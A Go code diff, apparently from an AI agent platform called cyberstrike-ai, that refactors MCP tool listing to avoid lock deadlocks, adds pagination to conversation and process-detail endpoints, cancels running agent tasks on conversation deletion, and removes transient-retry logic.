setStringInMap(visionNode, "detail", cfg.Detail)
|
||||||
}
|
}
|
||||||
if len(cfg.AllowedRoots) > 0 {
|
|
||||||
setStringSliceInMap(visionNode, "allowed_roots", cfg.AllowedRoots)
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
|
|
||||||
func updateOpenAIConfig(doc *yaml.Node, cfg config.OpenAIConfig) {
|
func updateOpenAIConfig(doc *yaml.Node, cfg config.OpenAIConfig) {
|
||||||
@@ -1909,50 +2004,52 @@ func setFloatInMap(mapNode *yaml.Node, key string, value float64) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
// getExternalMCPTools 获取外部MCP工具列表(公共方法)
|
// getExternalMCPTools 获取外部MCP工具列表(公共方法)
|
||||||
// 返回 ToolConfigInfo 列表,已处理启用状态和描述信息
|
|
||||||
func (h *ConfigHandler) getExternalMCPTools(ctx context.Context) []ToolConfigInfo {
|
func (h *ConfigHandler) getExternalMCPTools(ctx context.Context) []ToolConfigInfo {
|
||||||
var result []ToolConfigInfo
|
|
||||||
|
|
||||||
if h.externalMCPMgr == nil {
|
if h.externalMCPMgr == nil {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
return h.getExternalMCPToolsWithManager(ctx, h.externalMCPMgr, h.pickToolDescription)
|
||||||
|
}
|
||||||
|
|
||||||
|
// getExternalMCPToolsWithManager 获取外部 MCP 工具(不持有 config 锁,供 GetTools 等热路径使用)
|
||||||
|
func (h *ConfigHandler) getExternalMCPToolsWithManager(
|
||||||
|
ctx context.Context,
|
||||||
|
mgr *mcp.ExternalMCPManager,
|
||||||
|
pickDesc func(shortDesc, fullDesc string) string,
|
||||||
|
) []ToolConfigInfo {
|
||||||
|
var result []ToolConfigInfo
|
||||||
|
if mgr == nil {
|
||||||
return result
|
return result
|
||||||
}
|
}
|
||||||
|
|
||||||
// 使用较短的超时时间(5秒)进行快速失败,避免阻塞页面加载
|
|
||||||
timeoutCtx, cancel := context.WithTimeout(ctx, 5*time.Second)
|
timeoutCtx, cancel := context.WithTimeout(ctx, 5*time.Second)
|
||||||
defer cancel()
|
defer cancel()
|
||||||
|
|
||||||
externalTools, err := h.externalMCPMgr.GetAllTools(timeoutCtx)
|
externalTools, err := mgr.GetAllTools(timeoutCtx)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
// 记录警告但不阻塞,继续返回已缓存的工具(如果有)
|
|
||||||
h.logger.Warn("获取外部MCP工具失败(可能连接断开),尝试返回缓存的工具",
|
h.logger.Warn("获取外部MCP工具失败(可能连接断开),尝试返回缓存的工具",
|
||||||
zap.Error(err),
|
zap.Error(err),
|
||||||
zap.String("hint", "如果外部MCP工具未显示,请检查连接状态或点击刷新按钮"),
|
zap.String("hint", "如果外部MCP工具未显示,请检查连接状态或点击刷新按钮"),
|
||||||
)
|
)
|
||||||
}
|
}
|
||||||
|
|
||||||
// 如果获取到了工具(即使有错误),继续处理
|
|
||||||
if len(externalTools) == 0 {
|
if len(externalTools) == 0 {
|
||||||
return result
|
return result
|
||||||
}
|
}
|
||||||
|
|
||||||
externalMCPConfigs := h.externalMCPMgr.GetConfigs()
|
externalMCPConfigs := mgr.GetConfigs()
|
||||||
|
|
||||||
for _, externalTool := range externalTools {
|
for _, externalTool := range externalTools {
|
||||||
// 解析工具名称:mcpName::toolName
|
|
||||||
mcpName, actualToolName := h.parseExternalToolName(externalTool.Name)
|
mcpName, actualToolName := h.parseExternalToolName(externalTool.Name)
|
||||||
if mcpName == "" || actualToolName == "" {
|
if mcpName == "" || actualToolName == "" {
|
||||||
continue // 跳过格式不正确的工具
|
continue
|
||||||
}
|
}
|
||||||
|
|
||||||
// 计算启用状态
|
enabled := h.calculateExternalToolEnabledWithManager(mcpName, actualToolName, externalMCPConfigs, mgr)
|
||||||
enabled := h.calculateExternalToolEnabled(mcpName, actualToolName, externalMCPConfigs)
|
|
||||||
|
|
||||||
// 处理描述信息
|
|
||||||
description := h.pickToolDescription(externalTool.ShortDescription, externalTool.Description)
|
|
||||||
|
|
||||||
result = append(result, ToolConfigInfo{
|
result = append(result, ToolConfigInfo{
|
||||||
Name: actualToolName,
|
Name: actualToolName,
|
||||||
Description: description,
|
Description: pickDesc(externalTool.ShortDescription, externalTool.Description),
|
||||||
Enabled: enabled,
|
Enabled: enabled,
|
||||||
IsExternal: true,
|
IsExternal: true,
|
||||||
ExternalMCP: mcpName,
|
ExternalMCP: mcpName,
|
||||||
@@ -1973,40 +2070,48 @@ func (h *ConfigHandler) parseExternalToolName(fullName string) (mcpName, toolNam
|
|||||||
|
|
||||||
// calculateExternalToolEnabled 计算外部工具的启用状态
|
// calculateExternalToolEnabled 计算外部工具的启用状态
|
||||||
func (h *ConfigHandler) calculateExternalToolEnabled(mcpName, toolName string, configs map[string]config.ExternalMCPServerConfig) bool {
|
func (h *ConfigHandler) calculateExternalToolEnabled(mcpName, toolName string, configs map[string]config.ExternalMCPServerConfig) bool {
|
||||||
|
return h.calculateExternalToolEnabledWithManager(mcpName, toolName, configs, h.externalMCPMgr)
|
||||||
|
}
|
||||||
|
|
||||||
|
func (h *ConfigHandler) calculateExternalToolEnabledWithManager(
|
||||||
|
mcpName, toolName string,
|
||||||
|
configs map[string]config.ExternalMCPServerConfig,
|
||||||
|
mgr *mcp.ExternalMCPManager,
|
||||||
|
) bool {
|
||||||
cfg, exists := configs[mcpName]
|
cfg, exists := configs[mcpName]
|
||||||
if !exists {
|
if !exists {
|
||||||
return false
|
return false
|
||||||
}
|
}
|
||||||
|
|
||||||
// 首先检查外部MCP是否启用
|
|
||||||
if !cfg.ExternalMCPEnable {
|
if !cfg.ExternalMCPEnable {
|
||||||
return false // MCP未启用,所有工具都禁用
|
return false
|
||||||
}
|
}
|
||||||
|
|
||||||
// MCP已启用,检查单个工具的启用状态
|
if cfg.ToolEnabled != nil {
|
||||||
// 如果ToolEnabled为空或未设置该工具,默认为启用(向后兼容)
|
if toolEnabled, exists := cfg.ToolEnabled[toolName]; exists && !toolEnabled {
|
||||||
if cfg.ToolEnabled == nil {
|
|
||||||
// 未设置工具状态,默认为启用
|
|
||||||
} else if toolEnabled, exists := cfg.ToolEnabled[toolName]; exists {
|
|
||||||
// 使用配置的工具状态
|
|
||||||
if !toolEnabled {
|
|
||||||
return false
|
return false
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
// 工具未在配置中,默认为启用
|
|
||||||
|
|
||||||
// 最后检查外部MCP是否已连接
|
if mgr == nil {
|
||||||
client, exists := h.externalMCPMgr.GetClient(mcpName)
|
return false
|
||||||
|
}
|
||||||
|
client, exists := mgr.GetClient(mcpName)
|
||||||
if !exists || !client.IsConnected() {
|
if !exists || !client.IsConnected() {
|
||||||
return false // 未连接时视为禁用
|
return false
|
||||||
}
|
}
|
||||||
|
|
||||||
return true
|
return true
|
||||||
}
|
}
|
||||||
|
|
||||||
// pickToolDescription 根据 security.tool_description_mode 选择 short 或 full 描述并限制长度
|
// pickToolDescription 根据 security.tool_description_mode 选择 short 或 full 描述并限制长度。
|
||||||
|
// 调用方若已持有 h.mu 读锁,须直接读 mode 并调用 pickToolDescriptionWithMode,避免嵌套 RLock 死锁。
|
||||||
func (h *ConfigHandler) pickToolDescription(shortDesc, fullDesc string) string {
|
func (h *ConfigHandler) pickToolDescription(shortDesc, fullDesc string) string {
|
||||||
useFull := strings.TrimSpace(strings.ToLower(h.config.Security.ToolDescriptionMode)) == "full"
|
return pickToolDescriptionWithMode(h.config.Security.ToolDescriptionMode, shortDesc, fullDesc)
|
||||||
|
}
|
||||||
|
|
||||||
|
func pickToolDescriptionWithMode(mode, shortDesc, fullDesc string) string {
|
||||||
|
useFull := strings.TrimSpace(strings.ToLower(mode)) == "full"
|
||||||
description := shortDesc
|
description := shortDesc
|
||||||
if useFull {
|
if useFull {
|
||||||
description = fullDesc
|
description = fullDesc
|
||||||
@@ -2021,23 +2126,22 @@ func (h *ConfigHandler) pickToolDescription(shortDesc, fullDesc string) string {
|
|||||||
|
|
||||||
// GetToolSchema 获取单个工具的 inputSchema(按需加载,避免列表接口返回大量 schema 数据)
|
// GetToolSchema 获取单个工具的 inputSchema(按需加载,避免列表接口返回大量 schema 数据)
|
||||||
func (h *ConfigHandler) GetToolSchema(c *gin.Context) {
|
func (h *ConfigHandler) GetToolSchema(c *gin.Context) {
|
||||||
h.mu.RLock()
|
|
||||||
defer h.mu.RUnlock()
|
|
||||||
|
|
||||||
toolName := c.Param("name")
|
toolName := c.Param("name")
|
||||||
if toolName == "" {
|
if toolName == "" {
|
||||||
c.JSON(http.StatusBadRequest, gin.H{"error": "工具名称不能为空"})
|
c.JSON(http.StatusBadRequest, gin.H{"error": "工具名称不能为空"})
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
// 检查是否为外部工具(格式:mcpName::toolName)
|
|
||||||
externalMCP := c.Query("external_mcp")
|
externalMCP := c.Query("external_mcp")
|
||||||
if externalMCP != "" {
|
if externalMCP != "" {
|
||||||
// 外部 MCP 工具
|
h.mu.RLock()
|
||||||
if h.externalMCPMgr != nil {
|
externalMCPMgr := h.externalMCPMgr
|
||||||
|
h.mu.RUnlock()
|
||||||
|
|
||||||
|
if externalMCPMgr != nil {
|
||||||
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
|
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
|
||||||
defer cancel()
|
defer cancel()
|
||||||
externalTools, _ := h.externalMCPMgr.GetAllTools(ctx)
|
externalTools, _ := externalMCPMgr.GetAllTools(ctx)
|
||||||
fullName := externalMCP + "::" + toolName
|
fullName := externalMCP + "::" + toolName
|
||||||
for _, t := range externalTools {
|
for _, t := range externalTools {
|
||||||
if t.Name == fullName {
|
if t.Name == fullName {
|
||||||
@@ -2050,8 +2154,12 @@ func (h *ConfigHandler) GetToolSchema(c *gin.Context) {
|
|||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
// 内部工具:从 YAML 配置的 Parameters 构建
|
h.mu.RLock()
|
||||||
for _, tool := range h.config.Security.Tools {
|
securityTools := append([]config.ToolConfig(nil), h.config.Security.Tools...)
|
||||||
|
mcpServer := h.mcpServer
|
||||||
|
h.mu.RUnlock()
|
||||||
|
|
||||||
|
for _, tool := range securityTools {
|
||||||
if tool.Name == toolName {
|
if tool.Name == toolName {
|
||||||
c.JSON(http.StatusOK, gin.H{"input_schema": buildInputSchemaFromParams(tool.Parameters)})
|
c.JSON(http.StatusOK, gin.H{"input_schema": buildInputSchemaFromParams(tool.Parameters)})
|
||||||
return
|
return
|
||||||
@@ -2059,8 +2167,8 @@ func (h *ConfigHandler) GetToolSchema(c *gin.Context) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
// MCP 注册工具(如知识检索)
|
// MCP 注册工具(如知识检索)
|
||||||
if h.mcpServer != nil {
|
if mcpServer != nil {
|
||||||
for _, mt := range h.mcpServer.GetAllTools() {
|
for _, mt := range mcpServer.GetAllTools() {
|
||||||
if mt.Name == toolName {
|
if mt.Name == toolName {
|
||||||
c.JSON(http.StatusOK, gin.H{"input_schema": mt.InputSchema})
|
c.JSON(http.StatusOK, gin.H{"input_schema": mt.InputSchema})
|
||||||
return
|
return
|
||||||
|
|||||||
@@ -12,11 +12,17 @@ import (
|
|||||||
"go.uber.org/zap"
|
"go.uber.org/zap"
|
||||||
)
|
)
|
||||||
|
|
||||||
|
// ConversationTaskStopper cancels in-flight agent work when a conversation is removed.
|
||||||
|
type ConversationTaskStopper interface {
|
||||||
|
CancelRunningTaskForConversation(conversationID string)
|
||||||
|
}
|
||||||
|
|
||||||
// ConversationHandler 对话处理器
|
// ConversationHandler 对话处理器
|
||||||
type ConversationHandler struct {
|
type ConversationHandler struct {
|
||||||
db *database.DB
|
db *database.DB
|
||||||
logger *zap.Logger
|
logger *zap.Logger
|
||||||
audit *audit.Service
|
audit *audit.Service
|
||||||
|
taskStopper ConversationTaskStopper
|
||||||
}
|
}
|
||||||
|
|
||||||
// SetAudit wires platform audit logging.
|
// SetAudit wires platform audit logging.
|
||||||
@@ -24,6 +30,11 @@ func (h *ConversationHandler) SetAudit(s *audit.Service) {
|
|||||||
h.audit = s
|
h.audit = s
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// SetTaskStopper wires cancellation of in-flight agent tasks on conversation delete.
|
||||||
|
func (h *ConversationHandler) SetTaskStopper(stopper ConversationTaskStopper) {
|
||||||
|
h.taskStopper = stopper
|
||||||
|
}
|
||||||
|
|
||||||
// NewConversationHandler 创建新的对话处理器
|
// NewConversationHandler 创建新的对话处理器
|
||||||
func NewConversationHandler(db *database.DB, logger *zap.Logger) *ConversationHandler {
|
func NewConversationHandler(db *database.DB, logger *zap.Logger) *ConversationHandler {
|
||||||
return &ConversationHandler{
|
return &ConversationHandler{
|
||||||
@@ -96,18 +107,45 @@ func (h *ConversationHandler) ListConversations(c *gin.Context) {
|
|||||||
limit, _ := strconv.Atoi(limitStr)
|
limit, _ := strconv.Atoi(limitStr)
|
||||||
offset, _ := strconv.Atoi(offsetStr)
|
offset, _ := strconv.Atoi(offsetStr)
|
||||||
|
|
||||||
if limit <= 0 || limit > 100 {
|
if limit <= 0 {
|
||||||
limit = 50
|
limit = 50
|
||||||
}
|
}
|
||||||
|
if limit > 1000 {
|
||||||
|
limit = 1000
|
||||||
|
}
|
||||||
|
|
||||||
conversations, err := h.db.ListConversations(limit, offset, search)
|
excludeGrouped := strings.TrimSpace(search) == "" &&
|
||||||
|
(c.Query("exclude_grouped") == "true" || c.Query("exclude_grouped") == "1")
|
||||||
|
sortBy := strings.TrimSpace(c.Query("sort_by"))
|
||||||
|
|
||||||
|
var conversations []*database.Conversation
|
||||||
|
var total int
|
||||||
|
var err error
|
||||||
|
if excludeGrouped {
|
||||||
|
conversations, err = h.db.ListUngroupedConversations(limit, offset, sortBy)
|
||||||
|
if err == nil {
|
||||||
|
total, err = h.db.CountUngroupedConversations()
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
conversations, err = h.db.ListConversations(limit, offset, search, sortBy)
|
||||||
|
if err == nil {
|
||||||
|
total, err = h.db.CountConversations(search)
|
||||||
|
}
|
||||||
|
}
|
||||||
if err != nil {
|
if err != nil {
|
||||||
h.logger.Error("获取对话列表失败", zap.Error(err))
|
h.logger.Error("获取对话列表失败", zap.Error(err))
|
||||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
if conversations == nil {
|
||||||
c.JSON(http.StatusOK, conversations)
|
conversations = []*database.Conversation{}
|
||||||
|
}
|
||||||
|
c.JSON(http.StatusOK, gin.H{
|
||||||
|
"conversations": conversations,
|
||||||
|
"total": total,
|
||||||
|
"limit": limit,
|
||||||
|
"offset": offset,
|
||||||
|
})
|
||||||
}
|
}
|
||||||
|
|
||||||
// GetConversation 获取对话
|
// GetConversation 获取对话
|
||||||
@@ -138,6 +176,9 @@ func (h *ConversationHandler) GetConversation(c *gin.Context) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
// GetMessageProcessDetails 获取指定消息的过程详情(按需加载)
|
// GetMessageProcessDetails 获取指定消息的过程详情(按需加载)
|
||||||
|
// 查询参数:
|
||||||
|
// - summary=1:仅返回摘要(total / iterationCount / maxIteration)
|
||||||
|
// - limit + offset:分页返回 processDetails(未指定 limit 时保持全量兼容)
|
||||||
func (h *ConversationHandler) GetMessageProcessDetails(c *gin.Context) {
|
func (h *ConversationHandler) GetMessageProcessDetails(c *gin.Context) {
|
||||||
messageID := c.Param("id")
|
messageID := c.Param("id")
|
||||||
if messageID == "" {
|
if messageID == "" {
|
||||||
@@ -145,6 +186,51 @@ func (h *ConversationHandler) GetMessageProcessDetails(c *gin.Context) {
|
|||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
|
summaryStr := strings.TrimSpace(c.Query("summary"))
|
||||||
|
if summaryStr == "1" || strings.EqualFold(summaryStr, "true") || strings.EqualFold(summaryStr, "yes") {
|
||||||
|
summary, err := h.db.GetProcessDetailsSummary(messageID)
|
||||||
|
if err != nil {
|
||||||
|
h.logger.Error("获取过程详情摘要失败", zap.Error(err))
|
||||||
|
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
c.JSON(http.StatusOK, gin.H{"summary": summary})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
limitStr := strings.TrimSpace(c.Query("limit"))
|
||||||
|
if limitStr != "" {
|
||||||
|
limit, err := strconv.Atoi(limitStr)
|
||||||
|
if err != nil || limit <= 0 {
|
||||||
|
c.JSON(http.StatusBadRequest, gin.H{"error": "invalid limit"})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if limit > 500 {
|
||||||
|
limit = 500
|
||||||
|
}
|
||||||
|
offset, _ := strconv.Atoi(strings.TrimSpace(c.Query("offset")))
|
||||||
|
if offset < 0 {
|
||||||
|
offset = 0
|
||||||
|
}
|
||||||
|
|
||||||
|
details, total, err := h.db.GetProcessDetailsPage(messageID, limit, offset)
|
||||||
|
if err != nil {
|
||||||
|
h.logger.Error("分页获取过程详情失败", zap.Error(err))
|
||||||
|
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
details = database.DedupeConsecutiveProcessDetails(details)
|
||||||
|
out := processDetailsToJSON(h.logger, details)
|
||||||
|
c.JSON(http.StatusOK, gin.H{
|
||||||
|
"processDetails": out,
|
||||||
|
"total": total,
|
||||||
|
"offset": offset,
|
||||||
|
"limit": limit,
|
||||||
|
"hasMore": offset+len(out) < total,
|
||||||
|
})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
details, err := h.db.GetProcessDetails(messageID)
|
details, err := h.db.GetProcessDetails(messageID)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
h.logger.Error("获取过程详情失败", zap.Error(err))
|
h.logger.Error("获取过程详情失败", zap.Error(err))
|
||||||
@@ -153,14 +239,17 @@ func (h *ConversationHandler) GetMessageProcessDetails(c *gin.Context) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
details = database.DedupeConsecutiveProcessDetails(details)
|
details = database.DedupeConsecutiveProcessDetails(details)
|
||||||
|
out := processDetailsToJSON(h.logger, details)
|
||||||
|
c.JSON(http.StatusOK, gin.H{"processDetails": out, "total": len(out)})
|
||||||
|
}
|
||||||
|
|
||||||
// 转换为前端期望的 JSON 结构(与 GetConversation 中 processDetails 结构一致)
|
func processDetailsToJSON(logger *zap.Logger, details []database.ProcessDetail) []map[string]interface{} {
|
||||||
out := make([]map[string]interface{}, 0, len(details))
|
out := make([]map[string]interface{}, 0, len(details))
|
||||||
for _, d := range details {
|
for _, d := range details {
|
||||||
var data interface{}
|
var data interface{}
|
||||||
if d.Data != "" {
|
if d.Data != "" {
|
||||||
if err := json.Unmarshal([]byte(d.Data), &data); err != nil {
|
if err := json.Unmarshal([]byte(d.Data), &data); err != nil {
|
||||||
h.logger.Warn("解析过程详情数据失败", zap.Error(err))
|
logger.Warn("解析过程详情数据失败", zap.Error(err))
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
out = append(out, map[string]interface{}{
|
out = append(out, map[string]interface{}{
|
||||||
@@ -173,8 +262,7 @@ func (h *ConversationHandler) GetMessageProcessDetails(c *gin.Context) {
|
|||||||
"createdAt": d.CreatedAt,
|
"createdAt": d.CreatedAt,
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
|
return out
|
||||||
c.JSON(http.StatusOK, gin.H{"processDetails": out})
|
|
||||||
}
|
}
|
||||||
|
|
||||||
// UpdateConversationRequest 更新对话请求
|
// UpdateConversationRequest 更新对话请求
|
||||||
@@ -218,6 +306,10 @@ func (h *ConversationHandler) UpdateConversation(c *gin.Context) {
|
|||||||
func (h *ConversationHandler) DeleteConversation(c *gin.Context) {
|
func (h *ConversationHandler) DeleteConversation(c *gin.Context) {
|
||||||
id := c.Param("id")
|
id := c.Param("id")
|
||||||
|
|
||||||
|
if h.taskStopper != nil {
|
||||||
|
h.taskStopper.CancelRunningTaskForConversation(id)
|
||||||
|
}
|
||||||
|
|
||||||
if err := h.db.DeleteConversation(id); err != nil {
|
if err := h.db.DeleteConversation(id); err != nil {
|
||||||
h.logger.Error("删除对话失败", zap.Error(err))
|
h.logger.Error("删除对话失败", zap.Error(err))
|
||||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||||
|
|||||||
@@ -0,0 +1,30 @@
|
|||||||
|
package handler
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"testing"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"go.uber.org/zap"
|
||||||
|
)
|
||||||
|
|
||||||
|
func TestConversationHandlerDeleteConversationCancelsRunningTask(t *testing.T) {
|
||||||
|
tm := NewAgentTaskManager()
|
||||||
|
ctx, cancel := context.WithCancelCause(context.Background())
|
||||||
|
_, err := tm.StartTask("conv-1", "hello", cancel)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("StartTask: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
h := &AgentHandler{tasks: tm, logger: zap.NewNop()}
|
||||||
|
h.CancelRunningTaskForConversation("conv-1")
|
||||||
|
|
||||||
|
select {
|
||||||
|
case <-ctx.Done():
|
||||||
|
case <-time.After(2 * time.Second):
|
||||||
|
t.Fatal("task context was not cancelled")
|
||||||
|
}
|
||||||
|
if cause := context.Cause(ctx); cause != ErrTaskCancelled {
|
||||||
|
t.Fatalf("expected ErrTaskCancelled, got %v", cause)
|
||||||
|
}
|
||||||
|
}
|
||||||
@@ -2,29 +2,11 @@ package handler
|
|||||||
|
|
||||||
import (
|
import (
|
||||||
"context"
|
"context"
|
||||||
"errors"
|
|
||||||
"fmt"
|
|
||||||
"strings"
|
|
||||||
"time"
|
|
||||||
|
|
||||||
"cyberstrike-ai/internal/agent"
|
"cyberstrike-ai/internal/agent"
|
||||||
"cyberstrike-ai/internal/multiagent"
|
"cyberstrike-ai/internal/multiagent"
|
||||||
)
|
)
|
||||||
|
|
||||||
func (h *AgentHandler) einoRunRetryMaxAttempts() int {
|
|
||||||
if h.config != nil {
|
|
||||||
return multiagent.RunRetryMaxAttemptsFromConfig(&h.config.MultiAgent.EinoMiddleware)
|
|
||||||
}
|
|
||||||
return multiagent.RunRetryMaxAttemptsFromConfig(nil)
|
|
||||||
}
|
|
||||||
|
|
||||||
func (h *AgentHandler) einoRunRetryMaxBackoffSec() int {
|
|
||||||
if h.config != nil && h.config.MultiAgent.EinoMiddleware.RunRetryMaxBackoffSec > 0 {
|
|
||||||
return h.config.MultiAgent.EinoMiddleware.RunRetryMaxBackoffSec
|
|
||||||
}
|
|
||||||
return 0
|
|
||||||
}
|
|
||||||
|
|
||||||
// applyEinoTraceResumeSegment 中断并继续:persist last_react_* → loadHistory,可选替换下一段 user 文案。
|
// applyEinoTraceResumeSegment 中断并继续:persist last_react_* → loadHistory,可选替换下一段 user 文案。
|
||||||
func (h *AgentHandler) applyEinoTraceResumeSegment(
|
func (h *AgentHandler) applyEinoTraceResumeSegment(
|
||||||
conversationID string,
|
conversationID string,
|
||||||
@@ -43,80 +25,3 @@ func (h *AgentHandler) applyEinoTraceResumeSegment(
|
|||||||
*curFinalMessage = segmentUserMessage
|
*curFinalMessage = segmentUserMessage
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
// applyEinoTransientRetrySegment 临时错误重试:恢复轨迹并保留本请求原始 user 文案(不注入续跑说明)。
|
|
||||||
// segmentUserMessage 为本轮 HTTP 请求开始时用户发送的内容,避免因清空 finalMessage 而丢失「你好」等短句。
|
|
||||||
func (h *AgentHandler) applyEinoTransientRetrySegment(
|
|
||||||
conversationID string,
|
|
||||||
result *multiagent.RunResult,
|
|
||||||
curHistory *[]agent.ChatMessage,
|
|
||||||
curFinalMessage *string,
|
|
||||||
segmentUserMessage string,
|
|
||||||
) {
|
|
||||||
if shouldPersistEinoAgentTraceAfterRunError(context.Background()) {
|
|
||||||
h.persistEinoAgentTraceForResume(conversationID, result)
|
|
||||||
}
|
|
||||||
if hist, err := h.loadHistoryFromAgentTrace(conversationID); err == nil && len(hist) > 0 {
|
|
||||||
*curHistory = hist
|
|
||||||
}
|
|
||||||
if s := strings.TrimSpace(segmentUserMessage); s != "" {
|
|
||||||
*curFinalMessage = segmentUserMessage
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
// handleEinoTransientRetryContinue 在 SSE 任务循环内处理临时错误重试;返回 true 表示外层 for 应 continue。
|
|
||||||
func (h *AgentHandler) handleEinoTransientRetryContinue(
|
|
||||||
baseCtx context.Context,
|
|
||||||
conversationID string,
|
|
||||||
result *multiagent.RunResult,
|
|
||||||
runErr error,
|
|
||||||
transientAttempts *int,
|
|
||||||
curHistory *[]agent.ChatMessage,
|
|
||||||
curFinalMessage *string,
|
|
||||||
segmentUserMessage string,
|
|
||||||
progressCallback func(eventType, message string, data interface{}),
|
|
||||||
sendProgress func(msg string, extra map[string]interface{}),
|
|
||||||
) (handled bool, fatal error) {
|
|
||||||
if !errors.Is(runErr, multiagent.ErrTransientRetryContinue) {
|
|
||||||
return false, nil
|
|
||||||
}
|
|
||||||
maxAttempts := h.einoRunRetryMaxAttempts()
|
|
||||||
*transientAttempts++
|
|
||||||
if *transientAttempts > maxAttempts {
|
|
||||||
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
|
|
||||||
h.persistEinoAgentTraceForResume(conversationID, result)
|
|
||||||
}
|
|
||||||
return false, errors.New("transient retry exhausted: " + runErr.Error())
|
|
||||||
}
|
|
||||||
attemptNo := *transientAttempts
|
|
||||||
backoff := multiagent.TransientRetryBackoff(attemptNo-1, h.einoRunRetryMaxBackoffSec())
|
|
||||||
if progressCallback != nil {
|
|
||||||
progressCallback("eino_run_retry", fmt.Sprintf("遇到临时错误,%d 秒后第 %d/%d 次重试…", int(backoff.Seconds()), attemptNo, maxAttempts), map[string]interface{}{
|
|
||||||
"conversationId": conversationID,
|
|
||||||
"source": "eino",
|
|
||||||
"attempt": attemptNo,
|
|
||||||
"maxAttempts": maxAttempts,
|
|
||||||
"backoffSec": int(backoff.Seconds()),
|
|
||||||
})
|
|
||||||
}
|
|
||||||
select {
|
|
||||||
case <-baseCtx.Done():
|
|
||||||
return false, context.Cause(baseCtx)
|
|
||||||
case <-time.After(backoff):
|
|
||||||
}
|
|
||||||
h.applyEinoTransientRetrySegment(conversationID, result, curHistory, curFinalMessage, segmentUserMessage)
|
|
||||||
if progressCallback != nil {
|
|
||||||
progressCallback("eino_run_retry", "已恢复上下文,正在重试…", map[string]interface{}{
|
|
||||||
"conversationId": conversationID,
|
|
||||||
"source": "eino",
|
|
||||||
"attempt": attemptNo,
|
|
||||||
})
|
|
||||||
}
|
|
||||||
if sendProgress != nil {
|
|
||||||
sendProgress("正在重试…", map[string]interface{}{
|
|
||||||
"conversationId": conversationID,
|
|
||||||
"source": "transient_retry",
|
|
||||||
})
|
|
||||||
}
|
|
||||||
return true, nil
|
|
||||||
}
|
|
||||||
|
|||||||
@@ -119,7 +119,6 @@ func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
|
|||||||
|
|
||||||
var cancelWithCause context.CancelCauseFunc
|
var cancelWithCause context.CancelCauseFunc
|
||||||
curFinalMessage := prep.FinalMessage
|
curFinalMessage := prep.FinalMessage
|
||||||
segmentUserMessage := prep.FinalMessage // 本请求原始用户句,临时重试时不得丢失
|
|
||||||
curHistory := prep.History
|
curHistory := prep.History
|
||||||
roleTools := prep.RoleTools
|
roleTools := prep.RoleTools
|
||||||
|
|
||||||
@@ -177,7 +176,6 @@ func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
|
|||||||
taskOwned = true
|
taskOwned = true
|
||||||
|
|
||||||
var cumulativeMCPExecutionIDs []string
|
var cumulativeMCPExecutionIDs []string
|
||||||
var transientRunAttempts int
|
|
||||||
// 同一请求内分段续跑时,主代理 iteration 事件按偏移累计,避免 UI 出现「第3轮 → 第1轮」回跳。
|
// 同一请求内分段续跑时,主代理 iteration 事件按偏移累计,避免 UI 出现「第3轮 → 第1轮」回跳。
|
||||||
var mainIterationOffset int
|
var mainIterationOffset int
|
||||||
|
|
||||||
@@ -214,6 +212,7 @@ func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
|
|||||||
}
|
}
|
||||||
taskCtxLoop := mcp.WithMCPConversationID(taskCtx, conversationID)
|
taskCtxLoop := mcp.WithMCPConversationID(taskCtx, conversationID)
|
||||||
taskCtxLoop = mcp.WithToolRunRegistry(taskCtxLoop, h.tasks)
|
taskCtxLoop = mcp.WithToolRunRegistry(taskCtxLoop, h.tasks)
|
||||||
|
taskCtxLoop = mcp.WithEinoExecuteRunRegistry(taskCtxLoop, h.tasks)
|
||||||
taskCtxLoop = multiagent.WithHITLToolInterceptor(taskCtxLoop, func(ctx context.Context, toolName, arguments string) (string, error) {
|
taskCtxLoop = multiagent.WithHITLToolInterceptor(taskCtxLoop, func(ctx context.Context, toolName, arguments string) (string, error) {
|
||||||
return h.interceptHITLForEinoTool(ctx, cancelWithCause, conversationID, assistantMessageID, sendEvent, toolName, arguments)
|
return h.interceptHITLForEinoTool(ctx, cancelWithCause, conversationID, assistantMessageID, sendEvent, toolName, arguments)
|
||||||
})
|
})
|
||||||
@@ -223,8 +222,10 @@ func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
|
|||||||
h.config,
|
h.config,
|
||||||
&h.config.MultiAgent,
|
